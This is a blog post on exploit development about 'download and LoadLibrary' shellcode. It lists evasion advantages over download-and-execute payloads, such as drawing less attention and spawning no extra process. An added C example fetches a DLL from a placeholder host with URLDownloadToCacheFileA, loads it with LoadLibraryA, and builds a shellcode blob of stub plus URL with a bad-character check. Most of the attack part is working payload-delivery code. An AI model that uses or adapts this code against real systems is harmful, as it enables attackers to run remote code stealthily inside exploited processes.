Everyone and their dog seems to want to use download and execute shellcode in their exploits, even though it has some drawbacks:
- You need to create an .exe file on the system, which will very likely draw unwanted attention.
- You cannot use an API that downloads your file to a temporary location, because the temporary file will very likely not keep the .exe extension.
- You need to make an assumption about where a safe place is to write your .exe file, which means you can guess wrong and the code fails.
- You need to store the string ‘.exe’ in the download & execute shellcode, which makes it 4 bytes larger.
- You need to spawn an extra process, which will very likely draw attention.
- You leave cleaning up the exploited process to the download & execute shellcode, which makes it larger still.
To get around these problems, I created download and LoadLibrary shellcode: a shellcode that will download a DLL file to a temporary file and load it into the exploited process using LoadLibrary. The benefits of this approach are:
- Smaller code.
- You can use the URLDownloadToCacheFileA API function in urlmon, which downloads your DLL to a temporary file in the cache and hands back its path, meaning you do not need to provide a location yourself.
- No need to create an .exe file on the system: the extension of a DLL is irrelevant to LoadLibrary.
- No need to spawn an extra process.
- You can clean up the exploited process from the code in the DLL instead of the shellcode.
The size of the final shellcode depends on the length of the URL for your DLL. For the most recent version of the code it is 138 bytes + the length of the URL. This is a pretty decent reduction from the average download and execute shellcodes of 200+ bytes (excluding the URL) that I found around the interwebs.
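The sequence the shellcode performs, written out in plain C as an added example (this is not the shellcode from this post, nor its author's code): URLDownloadToCacheFileA picks the cache file name, LoadLibraryA maps it, and the payload DLL's DllMain does the cleanup. The helper at the bottom lays a URL out behind a stub the way the "stub + URL" size formula implies and rejects blobs containing bad characters. The URL (192.0.2.10/payload.dll), the placeholder stub bytes, the bad-character set and the BUILD_PAYLOAD_DLL switch are all assumptions; the Windows API calls only compile on Windows, the helper compiles anywhere.

```c
/*
 * Added example, not the shellcode from this post. Reference implementation
 * of download-and-LoadLibrary in C plus a payload layout helper.
 *
 *   Windows loader:  cl dl_loadlib.c urlmon.lib   (or gcc dl_loadlib.c -lurlmon)
 *   Payload DLL:     cl /LD /DBUILD_PAYLOAD_DLL dl_loadlib.c
 *
 * The URL, DLL name, stub bytes and bad-character set below are assumptions.
 */
#include <stdio.h>
#include <string.h>

#ifdef _WIN32
#include <windows.h>
#include <urlmon.h>
#pragma comment(lib, "urlmon.lib")

#ifdef BUILD_PAYLOAD_DLL
/* DLL side. LoadLibrary runs DllMain on the thread that called it, inside the
 * exploited process, so the cleanup the post moves out of the shellcode lives
 * here. This demo just reports itself and terminates the process so execution
 * never returns to the corrupted stack. */
BOOL WINAPI DllMain(HINSTANCE inst, DWORD reason, LPVOID reserved)
{
    (void)inst; (void)reserved;
    if (reason == DLL_PROCESS_ATTACH) {
        OutputDebugStringA("payload DLL loaded in exploited process\n");
        ExitProcess(0);
    }
    return TRUE;
}
#else
/* What the shellcode does, in C: urlmon chooses the cache path (the file
 * keeps whatever name the URL had, which LoadLibrary does not care about) and
 * that path is passed straight to LoadLibraryA. */
static HMODULE download_and_load(const char *url)
{
    char path[MAX_PATH];
    HRESULT hr = URLDownloadToCacheFileA(NULL, url, path, sizeof path, 0, NULL);
    if (FAILED(hr)) {
        fprintf(stderr, "URLDownloadToCacheFileA: 0x%08lx\n", (unsigned long)hr);
        return NULL;
    }
    return LoadLibraryA(path);
}
#endif
#endif /* _WIN32 */

/* Lay the final blob out as the post's size formula implies: the position-
 * independent stub first, then the URL as a NUL-terminated string the stub
 * locates relative to its own address. Returns the total size, or -1 if the
 * blob does not fit in `out` or any byte other than the terminating NUL is in
 * `badchars` (the stub itself is checked too). */
static int build_payload(const unsigned char *stub, size_t stub_len,
                         const char *url, const unsigned char *badchars,
                         size_t nbad, unsigned char *out, size_t out_cap)
{
    size_t url_len = strlen(url), total = stub_len + url_len + 1;
    if (total > out_cap) return -1;
    memcpy(out, stub, stub_len);
    memcpy(out + stub_len, url, url_len + 1);     /* copies the NUL as well */
    for (size_t i = 0; i + 1 < total; i++)         /* every byte but that NUL */
        for (size_t b = 0; b < nbad; b++)
            if (out[i] == badchars[b]) return -1;
    return (int)total;
}

#ifndef BUILD_PAYLOAD_DLL
int main(int argc, char **argv)
{
    /* Constructed placeholder (nop; nop; ret), not the real 138-byte stub. */
    static const unsigned char stub[] = { 0x90, 0x90, 0xc3 };
    static const unsigned char bad[]  = { 0x00, 0x0a, 0x0d };   /* assumed */
    unsigned char blob[512];
    const char *url = argc > 1 ? argv[1] : "http://192.0.2.10/payload.dll";
    int n = build_payload(stub, sizeof stub, url, bad, sizeof bad, blob, sizeof blob);
    if (n < 0) { fputs("bad character in blob or URL too long\n", stderr); return 1; }
    printf("shellcode: %d bytes = %zu stub + %zu URL + 1 NUL\n",
           n, sizeof stub, strlen(url));
#ifdef _WIN32
    HMODULE h = download_and_load(url);   /* the real sequence, Windows only */
    printf("LoadLibraryA -> %p\n", (void *)h);
#endif
    return 0;
}
#endif
```

Run the loader with the DLL's URL as the only argument; the bad-character check is the same one you would apply to the hand-assembled stub, since a NUL, newline or carriage return anywhere before the URL's terminator breaks most delivery vectors.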